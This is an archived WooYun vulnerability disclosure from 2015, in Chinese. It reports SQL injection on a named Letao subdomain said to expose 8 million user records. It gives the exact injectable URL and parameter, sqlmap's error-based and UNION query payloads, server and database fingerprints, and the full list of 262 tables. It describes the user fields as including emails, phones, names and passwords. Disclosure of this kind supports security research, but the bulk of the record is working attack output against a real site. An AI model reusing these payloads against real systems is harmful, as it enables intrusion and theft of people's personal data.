乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-20: 厂商已经主动忽略漏洞,细节向公众公开
乐淘网某站SQL注入涉及800万用户信息
注入点: http://wep.letao.com/wap/app_download.aspx?bid=12*&op=brand
涉及262张表
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 AND 9010=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9010=9010) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)))&op=brand Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(108)+CHAR(86)+CHAR(83)+CHAR(109)+CHAR(70)+CHAR(72)+CHAR(112)+CHAR(119)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL-- &op=brand---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008Database: letaoerp[262 tables]+------------------------------------+| Addressee || BRAND_TECH || BRAND_TECH || CH_ACCOUNT_BALANCE || CH_BOX_ORDER_DETAIL || CH_BOX_ORDER_DETAIL || CH_LOG || CH_RETURN_ORDER_DETAIL || CH_RETURN_ORDER_DETAIL || CH_RETURN_ORDER_RECORD || CH_SELL_ORDER_ADJUST || CH_SELL_ORDER_ADJUST || CH_SELL_ORDER_DETAIL || CH_SELL_ORDER_RECORD || CH_SELL_SCHEDULE_ORDER_DETAIL || CH_SELL_SCHEDULE_ORDER_DETAIL || CH_SHIP_ORDER_DETAIL || CH_SHIP_ORDER_DETAIL || CmsContent || Dealer || ERP_ADDR_AREA || ERP_ADDR_CITY || ERP_ADDR_PROVINCE || ERP_AD_DEFINE || ERP_AD_PLAN || ERP_ARTICLE_CONTENT || ERP_ARTICLE_CONTENT || ERP_ARTICLE_TYPE || ERP_BANK_BANK_CODE || ERP_BANK_BRANCH_LIST || ERP_BANK_CITY_LIST || ERP_BAOSHENG_STOCK || ERP_CHANNEL_PROMOTION_TABLE || ERP_COUPAN_BATCH || ERP_COUPAN_CAMPAIGN || ERP_COUPAN_EXCEPTION || ERP_COUPAN_RECORD || ERP_COUPAN_SECTION || ERP_COUPAN_USER_ALLOCATED || ERP_COUPON_DANPINPAI_LIST || ERP_COUPON_DANPIN_LIST || ERP_CO_PAY_RECORD_ONLINE || ERP_CO_REFUND_ORDER || ERP_CO_REJECT_ORDER || ERP_CUSTOMER || ERP_DEALER_PRODUCT_LIST || ERP_DEALER_STOCK_EXCEPTION || ERP_DEALER_STOCK_LIST || ERP_DEFECT_WARE_DETAIL || ERP_DEFECT_WARE_DETAIL || ERP_EDM_BATCH_SEND || ERP_EDM_UNSUBSCRIBER || ERP_EXPRESS_CONTRACT || ERP_EXPRESS_FORM_DEFINE || ERP_GIFT_CARD_DEFINE || ERP_GIFT_CARD_RECORD || ERP_INVENTORY_DIFFERENCE || ERP_INVENTORY_DIFF_ADJUST || ERP_INVENTORY_DIFF_ADJUST || ERP_INVENTORY_RESULT2 || ERP_INVENTORY_RESULT2 || ERP_INVENTORY_SCAN || ERP_INVENTORY_TASK || ERP_IPHONE_MESSAGE || ERP_InvitePraise_For_TaoBao || ERP_JOB || ERP_JUSHOU_INFO || ERP_KEYWORD_TRANSFER || ERP_MARKET_LIBAO || ERP_MARKET_ORDERGIFT || ERP_MARKET_PRODUCTGIFT || ERP_MARKET_URL || ERP_MATERIAL_APPLY_DETAIL || ERP_MATERIAL_APPLY_DETAIL || ERP_MATERIAL_DEALER || ERP_MATERIAL_ORDER || ERP_MATERIAL_PURCHASE_DETAIL || ERP_MATERIAL_PURCHASE_DETAIL || ERP_MATERIAL_STAT || ERP_MATERIAL_STOCK || ERP_MATERIAL_TRANSFER_DETAIL || ERP_MATERIAL_TRANSFER_DETAIL || ERP_MIAOSHA || ERP_MILK_API_LOG || ERP_MILK_APP_CONFIG || ERP_MOBILE_CATEGORY_CMS || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_SMS_BATCH_SEND || ERP_MiniSite_CSS || ERP_MiniSite_PageSource || ERP_MiniSite_Page_CSS || ERP_MiniSite_Page_Script || ERP_MiniSite_Script || ERP_NEARESST_DELIVERY || ERP_ONTHEHOUR_COUPAN || ERP_OP_ITEM_LOCK || ERP_OP_ITEM_LOG || ERP_ORDER_NOTIFY_HISTORY || ERP_ORDER_NOTIFY_HISTORY || ERP_PHONE_LOG || ERP_PHONE_NAMELOG || ERP_PO_SHIP_ORDER_DETAIL || ERP_PO_SHIP_ORDER_DETAIL || ERP_PRICE_FORMULA || ERP_PRODUCT_CATEGORY_DEFINE || ERP_PRODUCT_CHANGELOG || ERP_PRODUCT_DISCOUNT_DEFINE || ERP_PRODUCT_PRICE_MANAGER || ERP_PRODUCT_PROPERTIES || ERP_PRODUCT_PROPERTY_DEFINE || ERP_PROD_PRICE_CHANGELOG || ERP_PROMOTION_CATEGORY_LINK || ERP_PROMOTION_CATEGORY_LINK || ERP_PROMOTION_LIST || ERP_PROMOTION_PRICE_FORMULA || ERP_PROMOTION_PRODUCT || ERP_PURCHASE_DEFER_ORDER || ERP_PURCHASE_IMG || ERP_PURCHASE_ORDER_DETAIL || ERP_PURCHASE_ORDER_DETAIL || ERP_ProductOnlyCode || ERP_QQ_COUPAN_MAP_TABLE || ERP_QUE_TUI_HUO_RECORD || ERP_RECEIPT_ORIGINAL || ERP_RESTORE || ERP_RETURN_BY_EXPRESS_DETAIL || ERP_RETURN_BY_EXPRESS_DETAIL || ERP_RETURN_BY_EXPRESS_PROVINCE || ERP_RETURN_ORDER || ERP_RO_RESERVE_PROD_DETAIL || ERP_SALES_ORDER_DETAIL || ERP_SALES_ORDER_DETAIL || ERP_SALES_PREDICTION_BASE || ERP_SEM_KEYWORD_LIB || ERP_SEM_PROD_SKU_LIST || ERP_SEO_CHANEL_CLASS_URL || ERP_SEO_CHANEL_LEXICON || ERP_SEO_CHANEL_PAGE_CLASS || ERP_SEO_CHANEL_PAGE_KEY || ERP_SHIPPING_RECORD_DETAIL || ERP_SHIPPING_RECORD_DETAIL || ERP_SHOE_BRAND_SIZE_TABLE || ERP_SITE_MESSAGE || ERP_SITE_TEMPLATE_CMS || ERP_SO_BANKINFO || ERP_SO_BATCH || ERP_SO_DE_PRICE_DETAIL || ERP_STOCK_MAIN || ERP_STOCK_PICKUP_FORM_DETAIL || ERP_STOCK_PICKUP_FORM_DETAIL || ERP_STOCK_PROD_MOVE_DETAIL || ERP_STOCK_PROD_MOVE_DETAIL || ERP_STOCK_RETURN_DEALER_FORM || ERP_STOCK_RETURN_DEALER_RECORD || ERP_STOCK_SHELF_DEFINE || ERP_STOCK_TRANSFER || ERP_STOCK_UPC || ERP_STOCK_UPLOADSHELF_DETAIL || ERP_STOCK_UPLOADSHELF_FORM || ERP_ShippingTimeOutRule || ERP_TALLY_DIFFERENCE || ERP_TALLY_SCAN || ERP_TALLY_TASK_DETAIL || ERP_TALLY_TASK_DETAIL || ERP_TRANSFER_RULE || ERP_TUANGOU || ERP_Tie_Shoes_Method || ERP_Tie_Shoes_Step || ERP_UNION_LMWL_LIB || ERP_UNION_LMWL_LIB || ERP_UNION_NOTITY || ERP_UNION_PRE_REGISTER || ERP_UNION_STEP_RATIO || ERP_USERS || ERP_USER_ADMIN_LOG || ERP_USER_BIND_UNION_TABLE || ERP_USER_BLACKLIST || ERP_USER_COMMENT || ERP_USER_IP_RESTRICTION || ERP_USER_LOGIN_LOG || ERP_USER_WUYOU_CARD_LOG || ERP_USER_WUYOU_CARD_LOG || ERP_WAREHOUSE_PART || ERP_WAREHOUSE_PRINTER_SETTING || ERP_WEIBO_ERROR || ERP_WEIBO_KEYWORD || ERP_WEIBO_MESSAGE_LOG || ERP_WEIBO_MESSAGE_LOG || ERP_WORK_ORDER_BEFOREREFUND_DETAIL || ERP_WORK_ORDER_BEFOREREFUND_DETAIL || ERP_WORK_ORDER_CALLIN_DETAIL || ERP_WORK_ORDER_DETAIL || ERP_WORK_ORDER_EXPRESS || ERP_WORK_ORDER_LOG || ERP_WORK_ORDER_PHONE_LOG || ERP_WORK_ORDER_PORC_DETAIL || ERP_WORK_ORDER_RETURN_DETAIL || ERP_WORK_ORDER_STAFF_ONLINE_LOG || ERP_WORK_ORDER_TYPE_TIME_SET || ERP_WORK_ORDER_UNUSUAL_DETAIL || ERP_WORK_ORDER_UPGRADE_DETAIL || ERP_WORK_ORDER_UPGRADE_STAT_DETAIL || ERP_WorkOrder_Group_Member || ERP_WorkOrder_Group_Member || EXPRESS_COMPANY_USER || EXPRESS_DISTRIBUTE_RULE || Erp_tie_shoes_posterDes || ExpressCompany || FREE_TUAN_ORDER_DETAIL || FREE_TUAN_ORDER_FORM || INVOICE_PRINT || INVOICE_PRINT || Image || ORDER_COUPAN_RELATIONS || OrderDetail || OrderForm || OrderStatus || PRODUCT_BRAND_TECH_MAP || PRODUCT_BRAND_TECH_MAP || PROMO_SETTING || Payments || Po_Detail || ProdComment || ProductPresellDetail || ProductPresellDetail || Product_Style || PurChase_Order || SHIPPING_EXPENSE_RULE || SHIPPING_EXPENSE_RULE || SHIP_ORDER_DETAIL || SITE_SOURCE_BIND_TALBE || STOCK_BASE || STOCK_LOG || Shipping_Order || Storehouse || Third_Part_Logistics_Cost || Third_Part_Order_Syn || Third_Part_Sales_Prom_Detail || Third_Part_Sales_Prom_Detail || Third_Part_Sales_Prom_Log || Third_Part_Shop_Product || Transfer || UNION_PAPERS_IMG || UNION_PROMOTION || UN_Member || UN_S_Member || UN_School || USER_BLACKLIST || USER_UNION_BIND_TABLE || UnionIp || Union_Keys || UserCMS || Users || VIRTUAL_ACCOUNT_DETAIL || VIRTUAL_ACCOUNT_DETAIL || aa_neigou || erp_temp_order_commetnt || erp_temp_product || erp_temp_users || sysdiagrams |+------------------------------------+
800万用户
包含邮箱、手机、姓名、用户名、密码等字段
危害等级:无影响厂商忽略
忽略时间:2015-09-20 19:32
漏洞Rank:15 (WooYun评价)
暂无